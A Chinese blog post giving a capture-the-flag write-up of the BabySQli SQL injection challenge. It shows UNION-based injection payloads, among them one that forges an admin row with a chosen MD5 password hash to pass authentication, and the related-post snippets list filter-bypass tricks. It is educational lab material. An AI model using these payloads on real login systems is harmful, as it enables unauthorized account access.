[GXYCTF2019]BabySQli

最新推荐文章于 2024-02-05 14:00:03 发布
最新推荐文章于 2024-02-05 14:00:03 发布
阅读量148 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liuzixuan0207/article/details/117262987
版权

[GXYCTF2019]BabySQli

11/26/2020

阴雨 正常

查看网页源代码 发现search.php

访问search.php 发现

MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5

尝试base32+base64解密后得到select * from user where username = ‘$name’

接下来进行fuzzing 测试 在测试admin字段时得到回应 wrong pass 说明用户是admin

测试字段

1' Order by 4#

只有3个字段
使用联合注入

1' union select 'admin',2,3

回显wrong user
说明用户名不在第一列

1' union select 1,'admin',3

回显wrong pass

知识点
当查询的数据不存在时,联合查询就会构造一个虚拟的数据

输入admin,密码为md5(123456),代入查询时MySQL里面就会生成admin,123456的用户

同时使用123456密码进行登录,就可以绕过限制

利用这个知识点 我们可以构造payload

1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'--+&pw=123456

POST提交数据即可获得flag

ssp@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
[GXYCTF2019]BabySQli1wp
m0_55185160的博客
06-19 640
看到题目sqli 应该是个SQL注入题
[GXYCTF2019]BabySQli | 何为Union?
wuuconix's blog
05-21 177
[GXYCTF2019]BabySQli | 何为Union? 这道题主要考察利用union select绕过md5密码验证,掌握新姿势! 过滤的一些东西 试了一下,过滤了or和等于。但是用大写Or就可以绕过,等于可以用like绕过。 题目回显 题目的回显主要有三类wrong user wrong pass 和报错信息 过程模拟 首先试试万能密码! -1' Or 1 like 1# 返回wrong pass 而不是wrong user。说明我们用户名这关已经过了,只不过它还有一层对密码的验证,一般
[GXYCTF 2019]BabySqli
Aiwin的博客
08-10 1373
[GXYCTF 2019]BabySqli
GXYCTF2019 babysqli
weixin_45751765的博客
09-09 246
0x00 初试 一开始以为普通sql注入题 fuzz一下没过滤什么东西 or大小写直接绕过就行,但两个括号绕过之前倒没遇上过,尝试了各种编码好像也没用…
[GXYCTF2019]BabySQli1-BUUCTF
chinese_cabbage0的博客
02-05 600
主要是一个buuctf题目的解题过程,大家可以参考一下
[GXYCTF2019]BabySQli 1
m0_62422842的博客
05-22 1357
前言 刚经历了回家的奔波,为了慢慢过度到学习的状态来,就开始刷一些题,在做的时候发现这个题对我来说是个陌生有熟悉的知识,在此总结一下。 题目 题目非常单一, 随便输入几次后,发现admin是它的用户名,但密码怎么也试不出来,接着就用order by来爆出字段数,主要思路通过联合查询注入。最后出现了一串报错信息。猜想可能是某些关键词被过滤了,看了师傅的文章才发现是or关键词被过滤。查看网页源代码发现一串奇怪的编码。 用base家族一顿乱解。发现base32可以解码成功。 一看就是ba
BUUCTF | [GXYCTF2019]BabySQli
m_de_g的博客
12-25 2496
BUUCTF | [GXYCTF2019]BabySQli 一、必备基础知识 当=号被过滤了使用like,rlike绕过 当or被过滤了使用大小写绕过,双写绕过,&&绕过 二、实战化渗透 [GXYCTF2019]BabySQli 因为本道题目的请求方式是POST,直接上手抓包,便于我们方便测试 1.使用1'#进行简单的测试,报错 2. ...
BUUCTF之[GXYCTF2019]BabySQli
weixin_44632787的博客
10-03 2334
题目 这题看到这个页面,而且题目上说的。给人的感觉就是个SQL注入题。。。。 启动BurpSuite抓包看看 有两个可疑点: 一是报用户错误(wrong user!),通常如果有这种错误的时候要先爆破账号,得到正确的账号后再去爆破密码。 这里返回的绿色部分明显是加密后的数据 首先提取绿色部分的信息,经过排查发现可以先base32解密,再base64 原数据: MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3C
精美网页模版,橙色政府网站建设
05-09
模板介绍: 风格清晰大气,结构规整,内置工作流,信息签收、信息签发、互动交流等常用政府网站功能,相对其他模板,此模板增加了网站常用一些参数统计和投稿统计,主要功能全部采用自定义模型,可以任意扩展字段和...
C#做的超市管理系统。
11-17
用c#+sqlsever2005做的超市管理系统,暑假的课程设计。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8207
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
高级色系PPT11.pptx
05-08
高级色系PPT11.pptx
node-v7.9.0-linux-x86.tar.xz
最新发布
05-08
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
基于tensorflow的的cnn卷积神经网络的图像识别分类
05-08
【作品名称】:基于tensorflow的的cnn卷积神经网络的图像识别分类 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
### 数据分析概念、使用技巧、优缺点的文章
05-08
数据分析是指通过收集、清洗、处理和解释数据,以发现其中的模式、趋势和关联,从而提供决策支持或洞察见解的过程。它在各行各业中都扮演着至关重要的角色,从市场营销到科学研究,从金融领域到医疗保健,都有广泛的应用。
对微信帐单进行数据分析
05-08
#pip install pandas -i https://mirrors.aliyun.com/pypi/simple #安装pandas处理数据模块 #pip install xlwt -i https://mirrors.aliyun.com/pypi/simple #安装excel模块 #pip install openpyxl #从微信导出对帐帐单 import pandas as pd #引入pandas,重命名为pd,Python3.9.10版本的Pandas无法兼容低版本的xls import numpy as np #导入均值模块 #从第17行读取csv格式的帐单 df = pd.read_csv('微信支付账单(20230101-20230401).csv',header=16) #分析数据 ...... #将分析数据另存为out.xlsx ..... #进行交易进间分析 ...... #统计交易对方 ...... #将结果保存到excel ..... writer.close()

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值